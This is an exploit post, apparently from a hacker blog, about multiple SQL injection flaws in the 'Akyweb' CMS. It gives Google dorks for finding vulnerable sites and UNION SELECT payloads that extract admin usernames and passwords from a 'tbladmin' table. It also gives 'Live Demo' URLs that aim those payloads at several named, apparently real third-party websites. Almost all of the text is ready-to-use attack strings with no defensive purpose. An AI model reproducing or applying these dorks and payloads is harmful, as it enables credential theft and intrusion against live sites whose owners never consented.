+ Akyweb (MalingsiaL) Multiple SQL Injection Vulnerabilities +
+ Author : M3NW5
+ contach : M3NW5@hackermail.com
+ GreetZ : IndonesianCoder . ServerIsDown . SurabayaHackerLink
Open with Google malay.and search from malay page
--== Dork ==--
"Akyweb" inurl:news_details.php?pid=
[+] Exploit
/news_details.php?pid=-1%20union%20select%201,2,a_name,4,a_pwd,6,7,8,9+from+tbladmin--
[+] Live Demo
http://www.feishengamulets.com/news_details.php?pid=-1%20union%20select%201,2,a_name,4,a_pwd,6,7,8,9+from+tbladmin--
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
--== Dork ==--
"Akyweb" inurl:pproduct_detail.php?pid=
[+] Exploit
/pproduct_detail.php?pid=-2 union select 1,2,3,a_name,a_pwd,6,7,8,9,10,11,12,13,14,15+from+tbladmin--
[+] Live Demo
http://www.kursuslintah.com//pproduct_detail.php?pid=-2%20union%20select%201,2,3,a_name,a_pwd,6,7,8,9,10,11,12,
13,14,15+from+tbladmin--
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
--== Dork ==--
"Akyweb" inurl:product_detail.php?pid=
[+] Exploit 1
product_detail.php?pid=-39%20union%20select%201,2,3,4,concat_ws(0x3a,a_name,a_pwd),6,
7,8,9,10,11,12+from+tbladmin--
[+] Live Demo
http://tanamanbunga.com/product_detail.php?pid=-39%20union%20select%201,2,3,4,concat_ws(0x3a,a_name,a_pwd),6,
7,8,9,10,11,12+from+tbladmin--
[+] Exploit 2
product_detail.php?pid=-39%20union%20select%201,2,3,4,concat_ws(0x3a,a_name,a_pwd),6,7,
8,concat_ws(0x3a,a_name,a_pwd),10,11,12+from+tbladmin--
[+] Live Demo
http://www.beaverswim.com/product_detail.php?pid=-39%20union%20select%201,2,3,4,concat_ws(0x3a,a_name,a_pwd),6,7,
8,concat_ws(0x3a,a_name,a_pwd),10,11,12+from+tbladmin--
No comments:
Post a Comment